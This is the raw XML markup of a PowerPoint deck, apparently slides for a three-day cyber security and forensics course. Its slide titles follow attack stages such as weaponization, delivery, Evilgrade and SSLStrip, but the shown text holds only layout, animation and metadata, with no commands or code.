          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4007739" y="3046980"/>
            <a:ext cx="5105400" cy="3088512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5684139" y="3986841"/>
            <a:ext cx="1912768" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>System info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Types of hardware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19543672">
            <a:off x="-206340" y="2637493"/>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
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5684139" y="3993517"/>
            <a:ext cx="1912768" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>System info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Types of hardware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1219200"/>
            <a:ext cx="9144000" cy="5638797"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19543672">
            <a:off x="-233234" y="2624046"/>
            <a:ext cx="9532936" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="9600" b="1" cap="none" spc="0" dirty="0">
                <a:ln w="12700">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:pattFill prst="ltDnDiag">
                  <a:fgClr>
                    <a:srgbClr val="FF0000"/>
                  </a:fgClr>
                  <a:bgClr>
                    <a:schemeClr val="accent6">
                      <a:lumMod val="20000"/>
                      <a:lumOff val="80000"/>
                    </a:schemeClr>
                  </a:bgClr>
                </a:pattFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="5400000" algn="t" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>BORROWED</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2145674" y="5748007"/>
            <a:ext cx="6998326" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" dirty="0"/>
              <a:t>FULL NETWORK SET UP WITH IPs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par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="0" nodeType="after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2" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="49" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>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3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>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8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>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9"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>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7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>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0"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="80" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="81" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0"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21" presetClass="entr" presetSubtype="1" fill="hold" grpId="0"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wheel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="88" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="89" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="90" presetID="10"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4" grpId="2" animBg="1"/>
      <p:bldP spid="6" grpId="0" animBg="1"/>
      <p:bldP spid="6" grpId="1" animBg="1"/>
      <p:bldP spid="6" grpId="2" animBg="1"/>
      <p:bldP spid="7" grpId="0" animBg="1"/>
      <p:bldP spid="7" grpId="1" animBg="1"/>
      <p:bldP spid="8" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="1" animBg="1"/>
      <p:bldP spid="9" grpId="0" animBg="1"/>
      <p:bldP spid="9" grpId="1" animBg="1"/>
      <p:bldP spid="10" grpId="0" animBg="1"/>
      <p:bldP spid="10" grpId="1" animBg="1"/>
      <p:bldP spid="21" grpId="0"/>
      <p:bldP spid="22" grpId="0" animBg="1"/>
      <p:bldP spid="23" grpId="0" animBg="1"/>
      <p:bldP spid="24" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0" animBg="1"/>
      <p:bldP spid="27" grpId="0" animBg="1"/>
      <p:bldP spid="28" grpId="0" animBg="1"/>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1905</TotalTime>
  <Words>2837</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>610</Paragraphs>
  <Slides>57</Slides>
  <Notes>0</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73" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>Georgia</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>Lucida Sans</vt:lpstr>
      <vt:lpstr>Lucida Sans Typewriter</vt:lpstr>
      <vt:lpstr>Lucida Sans Unicode</vt:lpstr>
      <vt:lpstr>Palatino Linotype</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Package</vt:lpstr>
      <vt:lpstr>Cyber Security  and Forensics</vt:lpstr>
      <vt:lpstr>DAY 1</vt:lpstr>
      <vt:lpstr>DAY 1</vt:lpstr>
      <vt:lpstr>DAY 1</vt:lpstr>
      <vt:lpstr>DAY 1</vt:lpstr>
      <vt:lpstr>DAY 1</vt:lpstr>
      <vt:lpstr>DAY 2</vt:lpstr>
      <vt:lpstr>Tactical Cyber Threat</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Detecting Personas!</vt:lpstr>
      <vt:lpstr>CTI Types</vt:lpstr>
      <vt:lpstr>Government, Organizations, Companies and  CTI</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Vulnerable Shiraz!</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Detecting Attack Surface</vt:lpstr>
      <vt:lpstr>Weaponization</vt:lpstr>
      <vt:lpstr>Delivery</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Weaponization, Delivery and Exploitation in  Practice!</vt:lpstr>
      <vt:lpstr>Basic Weaponization and Delivery</vt:lpstr>
      <vt:lpstr>Exploitations and Actions on Target</vt:lpstr>
      <vt:lpstr>Further Weaponization</vt:lpstr>
      <vt:lpstr>Installation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Installation - Evilgrade</vt:lpstr>
      <vt:lpstr>Installation - Evilgrade</vt:lpstr>
      <vt:lpstr>Installation - Evilgrade</vt:lpstr>
      <vt:lpstr>Command &amp; Control (C2)</vt:lpstr>
      <vt:lpstr>Actions on Objectives</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Actions on Objectives- SSLStip</vt:lpstr>
      <vt:lpstr>Lab – Actions on Objectives- SSLStrip</vt:lpstr>
      <vt:lpstr>DAY 3</vt:lpstr>
      <vt:lpstr>Security Summer Camp  Information Hiding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Dehghantanha Ali</dc:creator>
  <cp:lastModifiedBy>Bob A</cp:lastModifiedBy>
  <cp:revision>34</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-07-21T22:31:13Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-07-23T17:21:06Z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2017-06-29T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Creator">
    <vt:lpwstr>Microsoft® PowerPoint® 2010</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="LastSaved">
    <vt:filetime>2017-07-21T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>